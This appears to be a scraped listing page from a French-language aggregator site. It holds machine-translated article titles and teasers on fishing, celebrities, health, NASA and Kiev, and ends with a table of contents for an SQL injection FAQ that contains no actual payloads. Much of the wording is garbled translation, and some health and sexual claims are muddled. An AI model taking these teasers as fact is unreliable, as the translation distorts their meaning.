Calendrier Pêche et prévisions de poisson Paix / poissons prédateurs pour 2017. photo 26/02/2017
Pêche noeuds comment attacher un crochet, se préparant à voler photo 26/02/2017
Euthanasie Coaster, un projet de montagnes russes destinés à la peine de mort photo 26/02/2017
page WEB peut être une preuve en cour photo 26/02/2017
Dans ce cosplay vous voulez jouer vous - même photo 25/02/2017
collection élégante de filles en provenance du Japon. photo 25/02/2017
Collez GOI (de GOI - Institut optique Etat) photo 24/02/2017
Les choses inutiles qui devrait rapidement se débarrasser photo 24/02/2017
habitudes quotidiennes Bad, en raison de laquelle il est ballonnements photo 24/02/2017
moteurs d'avions de leviers de commande (ORE), on ne sait jamais ... La photo 24/02/2017
Modern Design Carte de visite photo 23/02/2017
Chats, artiste Vladimir Roumiantsev photo 23/02/2017
Faits intéressants au sujet du film Prometheus photo 23/02/2017
Comme indiqué sur la conférence de la NASA? photo 21/02/2017
SSL format de certificat, comment convertir un certificat en .pem, .cer, .crt, .der, pkcs ou .pfx photo 21/02/2017
Types de saignements et les premières règles relatives aux aides que vous devez savoir! photo 20/02/2017
Les premiers signes de diabète, vous ne devez pas ignorer! photo 20/02/2017

Comment choisir le vin à votre plat "- la viande, blanc - pour les poissons rouges" effet ... Photo 08/03/2017 Règle
Comment habiller en fonction de l' âge et ne pas regarder idiot de vous sentir à quel âge vous-même? Marchez, je suppose, comme un boutonneux ... Photo 08/03/2017
Version sexy de "Follow Me" il y a des photographes russes Murad et Natalia haussmannien quelques années créé ... Photo 08/03/2017
Assiette de nutrition saine de l' Université Harvard et détient de nombreuses recherches de la science moderne pour optimiser ... Photo 08/03/2017
La NASA a ouvert l' accès à son logiciel, la NASA a ouvert l' accès gratuit au catalogue de logiciels 2017-2018. Comment ... Photo 08/03/2017
Kate Moss, la génération principale de la beauté, une femme fatale Chaque génération a sa principale beauté, une femme fatale, qui ... Photo 08/03/2017
101 Parachute cordon de dosage Pour la plupart des gens parachute familiers cordon comme un outil très pratique pour ... Photo 05/03/2017
Tout ce que vous vouliez savoir sur les pneus. types de marquage, saisonniers pneus sont le principal lien entre la voiture et la route. De ... Photo 05/03/2017
Comment choisir les épices et les assaisonnements naturels de haute qualité Comment choisir les épices naturelles et d' herbes dans le marché ou dans le ... Photo 04/03/2017
Emma Watson (26 ans) déshabillée pour Vanity Fair Mars Emma déshabillée pour le magazine Vanity Fair en Mars, cependant, sur la couverture ... Photo 04/03/2017
Emma Watson (Emma Watson) déshabillée pour le livre Natural Beauty Emma a décidé de le faire pour le livre Natural Beauty! Et elle ... Photo 04/03/2017
Tatouage avec l'image des héros célèbres Bitansky artiste de tatouage crée des tatouages incroyablement réalistes avec des images de héros célèbres ... Photo 03/03/2017
Conduire tous Kiev transports urbains Scheme marqué tous les itinéraires de bus, trolleybus et de tramway, et ... Photo 28/02/2017
Combien de fois faut avoir des relations sexuelles selon l'âge Beaucoup de gens sont curieux de savoir, des relations sexuelles, ils sont trop nombreux ou trop ... Photo 28/02/2017
Calendrier Pêche et prévisions de poisson Paix / poissons prédateurs en 2017 Il y a certaines phases de la lumière lorsque vous avez juste besoin d'être seul ... Photo 26/02/2017
nœuds de pêche Comment attacher un crochet, se préparant à voler Type de noeud sélectionné en fonction du type de ligne de pêche (monofilament ou ... Photo 26/02/2017
Euthanasie Coaster, un projet de montagnes russes destinés à la peine de mort L'auteur reconnaît que les montagnes russes ne sont pas la machine optimale pour ... Photo 26/02/2017
page WEB peut être une preuve en justice doit être entendu que, par exemple, le droit d' auteur ne viole pas en soi ... Photo 26/02/2017 existante
Dans ce cosplay, vous aurez envie de jouer des jeux de base des prototypes costume - personnages de dessin animé, anime, jeux vidéo, films, ... Photo 25/02/2017
collection élégante de filles en provenance du Japon. Japonais (Jap nihondzin / nippondzin, Nihon minzoku.) - Le peuple, le principal (plus de 98%) ... Photo 25/02/2017
Collez GOI (de GOI - Institut optique Etat) pâte GOI peut être utilisé pour le polissage des produits de divers ... Photo 24/02/2017

Chats. Peintre Vladimir Roumiantsev. photo 23/02/2017
"Prometheus" - Faits intéressants photo 23/02/2017
Vu cheerleaders lituaniennes? A voir! 23/02/2017
Olsen, Elizabeth / Elizabeth Olsen photo 23/02/2017
Elle était assise près de la fenêtre, et il est allé dans sa voiture ... La photo 23/02/2017
Chats photo, chats, chatons photo 23/02/2017
Comment peut fonctionner Tortue photo 23/02/2017
Bengal Cat Talking With Kitten 23/02/2017
La Banque Nationale a publié une nouvelle pièce (Photo) photo 23/02/2017
Il y a Protasov Yar 30 ans photo 23/02/2017
Photo Animaux photo 23/02/2017
Traduction NASA Ce qui est dit à la conférence de la NASA photo 23/02/2017
Quelque chose au sujet de la taille de Jupiter, Courses "Through" Sun photo 22/02/2017
rues centrales de Kiev va bloquer pendant cinq jours photo 20/02/2017
3 façons de rendre les gens Vagina goulot d' étranglement et la fermeté photo 20/02/2017
Monica Bellucci Gq Magazine en Italie, Février 2017 photo 20/02/2017
«Serebro» Groupe B Magazine Maxim, Mars 2017 photo 20/02/2017
Que faire si vous êtes détenu par la police - Article 146 Piraterie photo 20/02/2017
Il y a un nouveau libre OS photo 18/02/2017
Bois sous le microscope électronique photo 18/02/2017
Paiement par carte de marché en 2016 a montré une croissance significative photo 18/02/2017

social

Chargement en cours ...

Ваш IP: 66.249.93.38
Votre Pays: EU

Free 50 UAH for your Monobank card?

Injection SQL [FAQ complète]

0.INTRO

1. COMMENT TROUVER SQL INJECTION

4.Qu FAIRE SI filtre QUELQUE CHOSE.

5.ПОЛЕЗНЫЕ ФУНКЦИИ В MYSQL

6. КАК ЗАЩИТИТЬСЯ ОТ SQL INJECTION

7.ДОПОЛНЕНИЯ

Commentaires